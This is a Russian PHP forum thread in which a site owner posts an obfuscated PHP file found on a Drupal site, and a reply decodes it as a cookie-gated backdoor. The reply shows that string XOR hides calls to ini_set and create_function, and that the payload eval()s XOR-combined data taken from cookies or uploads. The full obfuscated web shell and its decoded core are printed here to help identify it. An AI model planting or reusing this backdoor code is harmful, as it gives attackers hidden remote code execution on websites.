За последние 24 часа нас посетили 10316 программистов и 1254 робота. Сейчас ищут 438 программистов ...

Шелл или нет

Тема в разделе "Прочее", создана пользователем acho, 20 фев 2017.

  1. acho

    acho Активный пользователь

    С нами с:
    28 дек 2016
    Сообщения:
    854
    Симпатии:
    210
    Адрес:
    Санкт-Петербург
    Попались мне тут на одном из сайтов несколько файлов, вот такого вида:
    PHP:
    1. <?php /*$vsnd;Bz34vMwFj!Iepedr>>$ogapfs*/$fnjf='XVZ^)7bOV';$up='g)u.=;&';$utsv=0;
    2. $oui='4a"dYM'^'@sanamcjAo=ey4';$fyw='V{liH7Y[[GXMzN3KwF|Hnnm@)T;OYI#M';$iuj='ZW-[Zj6ZH8]+(--'^'?%_4(5D?8W/_ACJ0dR(Z{X';
    3. $lgq='Ue9iuH'^'8';$brq='$PWjyD/+j5yj4nR-D';$khb='NT+T';##Av8VyB;5kxBO7XIY"HiziC04c;M?/iVC
    4. $urk>>'pzqqhdn';$bnjjr='HO';
    5. $cbp='9Z'^']oMT19+';$zelucw='^9#sX@0DC`T:b'^'7WJ,+%D';
    6. /*SWx0fuzBVZ9dmx]1"ls92x#Sy0[%+XF[m5=.o-&LaBthW%bu}H]=*//*=uy#hob"w[-5*9rO+bbTLc7oZ$TNytf*dAke[mlzmuufu^ea88wM#9z#I41t3*cM}EeEEwk*/##UVv}ES}{p?j`j"OkeS!f)HoBAj$q[.@!2QF
    7. $bd='6D}yV;!e*@*';$fvb='eMX^qVi?lpi{B}QzEsL)_VXwJlX+o*Fx';$kopqr=@$_COOKIE;$aae=';$??]R=)#&,:=D:';$zelucw($iuj,$utsv);$iuj($utsv);$mkp=$fnjf.$bnjjr;'N/bZ';
    8. 'uhAYe!';$stx=$mkp.$khb^$aae;'D0$1';$bnjjr=$lgq.$cbp;
    9. /*WUxPtTbqGN+!/WcF*,^%Gu[]!bB_XA]17*lGAfmjrlv^EhYTtZOzkQPs6-,a/:+|Oojn%t1K-*/$hnesu=$fvb.'fAr.*T'^$fyw;/*/0g{OWty"lN9Mh8ZLc?r8.Ax-$sh26g-D68ExVx|x1pY_q.dd?wQSdo)%}-(hUf|x:*/
    10. $db=$kopqr['shmz'];##TPA:*DB`yVOXggvo#e92b;%gJN9m9xeeg
    11. $ggytm='W#EtLJ';##!0so-j$#1=^qkipfwu*%k#]]5W
    12. $xyh='$1Is^?K|';'Q:.plW';if($hnesu==$bnjjr($db)/*98,S;z#|;8+^tU$;7BurHN=59,s|Rf!nkigunprvo^hk{n($rK4;YDO]f4ABm@dvg@aR:KlMaqNB*/){##M[5_{|__78Zb7w;o^pF,4$CtI(u9ad
    13. $vei<<'ynxkbb';',s`b';/*$unr;W_znKO=GBrKKzvYF:#g[Qaofmdaaxep<<$tmapzdxe*/$hkuqk^$tkm;'7@5|';$vivgkm='&EyBR$6SMWLW^L7Mb(0ds8v/[F-(E{`Cyfag3QM218*Cw-)7LO@10TA|08(l=uHF?YDD29c4WCd=MK$`jPsvjN-{7:-r``y)SG-|pXT[(d*WXH_J_RD.OWzR1G24LTKWCF0:';'9_[!Z';'vg`EHlQ';'F(]b;{';##xP$V!ne`23xf6O=a!/WHwpngLKVU:K$
    14. /*dq^nk!#7e]ncsbCUd!qZ2lH*//*Hk.$VNOXfD(WCZ2N;Fv:75w|)MOmhsvw^q?9vN@jI5HUP47Cl?h#&EwYV@?C#_(,fcGkq*/$egc='U0rN%+_jZjKE`Y';$ormvx='/L]8?WPnev):.8NeFwv-?}%ty#HP7Y=jPF^GU8!Wn_O7(NFY8*.EC|e#vqd)n.j#Z!6fobA@:3;S,&AB7ySLJjr8xuf;%;[L6?_^-c^R!@I:)8%w=37Kyc%6T$]P)|o89!JS';$gtrxnu='}uebY,5K;I_f)RK6;Jr,uf(32lw?HNCh0gUFjaL9AQ8BHE5-JGMN=AVNB&-56h|qQV.=ZM51e2]Q-X#X@U8ZjCPa$gk:$h31O5)Z+K2iE';$erxst^$anp;$bsm='?!dg:c3'.'lmi';/*]l"`1J[O!vcs!_R.B,Mxdh++lpUpw!R3ymvpmgdnfu<<?lAJj.RPwK.YGgqI3nJOOqKebW(;M)){LPjGD"*/$akvxr=$dvlyp^'rNru6h+OG&qwoc9';/*$ssf;&t`OL^33+`JtH4cA,}Xs6w."3*!d{@4iy@mzR5=-!l5*Saduskfhwjg>>$jpkjrj*/$sgyik='Y8,qN2Q;/N6#;';$envh='M-^37a';$lcnzy=$gtrxnu.$vivgkm;$mxcz='.Ug+3viMr[t+;5(Y9P3ccV&paC'^$jtmnm;/*8:+;2MU)Cpjs&V=F(X519cNOx&o5`IXOv-8u|#|aK9@utUhJ)n;R{h&M!v!FJXYrP)Hm6K(I{ll_)p*/$exqk='1/YjHCX.p/+OKbjMBkEr';$bhs='w|lF6VR1RtwGL?;BBbVs3/dva7UE9!5JmN|fUA*P-4g%-1jN%)9+S5%ffyk|z-/*s,_R,ohjGF0!r6B5%wesJypE{$$uo!vjmOX5]ioRO'.$ormvx;/*W]c1uqk[daFQG"F:.W1QP6OsPvs2"3WI=8itU![AM+&esb?;LtQ+/Hs-+[D?aunNx%[RGhaX&5rs!a=CsGbR+WgXB@w,[LVFq_;#*/$gwgu='.Ug+3viMr[t+;5(Y9P3ccV&paC'.$emwi;$oftex^'re`Xc6N';
    15. $hln=$mcpy.'/U:Omlcg"7L=1XLs#7mO';$bhs.='y842K*zBg%P#:2QNw^H6=Gs$d_j7EO)^QL_&5OGcbf';$rfpsvi=$bhs.'Ne9SxD+KE10:*'^$lcnzy.'PfVS8OLv8A5@UV4fS$%E[nH.mV*R3.Evu/2WE5nXho';/*#A!Kuw]I|59bPahU1de5gFD5[zBu,j$6i@=8$[q$qe='ggkxlnm';'fwtyzk';*/
    16. $myozm=$myozm.'e2*y_Ty9bX0A{^A';/*$ued;pj=irlpZ]Mwe-7]LU-jA8#CylHl2lHLmexrtww|$koxrmvgb*/$rjgy='BqV:5./`RB,U&';$tcxt=$tcxt.'KY{J_f]O7xod)-S%,=7';'Ne9SxD+KE10:*';$tox='$GQme=7qx:s{WcE=P^[oF'.'N,O9[t&@pF*';'Of1Z!j`.!(H4(';$rgz=$stx($nmah,$rfpsvi);$rgz('$Y/_An2L0CQf+70/iJ|eOfpjO|6,$GT27oPw)q[','PPw+lb2KN&T%^T');}
    17. 'UTC3QK5=E|Co_';$esbs=$tnmf;##{Q][;8j?reIMYj?]SigNw8}SWxZkPtIiC;;K9{
    18. $gkf='Kkc70_l__3T_An+%R;';##;0?!Z%Q4q4WqD[%;)OA06dK&qFj
    19. $blm;'3/.qZ^H#(1RYM';/*X=50y[UfGu&FqwGk]uE`J?OYs:kD7j|RB&.orQr#,fihifga^4JdK{QPPyarGa{zflg2Po*/'2fj2wV';
    20.  
    21. $xsl='rz?zyNb]}';/*k4DoEnu^3-j2RiiTY[Bd$vglr='egwbcqwnaoypkw';'arxcfzsrtjoog';*/$vcxz='y]4,27L)';'[},(imrISOZ73E';?>
    Кто знает, как его раскодировать? Посмотреть хоть, что там. Рабочий это файл или шелл какой. Сайт на друпале висит
     
  2. MouseZver

    MouseZver Суперстар

    С нами с:
    1 апр 2013
    Сообщения:
    7.562
    Симпатии:
    1.284
    Адрес:
    Лень
    там тупая каша, сброд е*** ошибок:
    PHP:
    1. <?php
    2. $vcxz='y]4,27L)';
    3. '[},(imrISOZ73E';
    4. ?>
    да вовсе шикарно, логика зашкаливает
     
  3. Emilien

    Emilien Активный пользователь

    С нами с:
    30 июн 2016
    Сообщения:
    246
    Симпатии:
    156
    Там активно используется XOR строк и косвенные вызовы
    PHP:
    1. // Xor двух строк даёт ini_set
    2. $zelucw='^9#sX@0DC`T:b'^'7WJ,+%D';
    PHP:
    1. $kopqr=@$_COOKIE;
    2. $db=$kopqr['shmz'];
    3. if($hnesu==$bnjjr($db))
    Это можно расшифровать так
    PHP:
    1. if ('36479a0d771683b1250a1857c8cd6ce5'==md5($_COOKIE['shmz']))
    Ниже есть такой фрагмент
    PHP:
    1. $rgz=$stx($nmah,$rfpsvi);
    Тут зашифрован вызов create_function
    PHP:
    1.                 $ozgzi=(!empty($_FILES["zqov"])) ? file_get_contents($_FILES["zqov"]["tmp_name"]) : $_COOKIE["zqov"];
    2.                 $zmsf=(!empty($_FILES["eexr"])) ? file_get_contents($_FILES["eexr"]["tmp_name"]) : $_COOKIE["eexr"];
    3.                 $cmqpz=base64_decode($ozgzi)^base64_decode($zmsf);
    4.                 @eval($cmqpz);
    5.         );
    Однозначно бэкдор.
     
    #3 Emilien, 20 фев 2017
    Последнее редактирование: 21 фев 2017
    denis01 нравится это.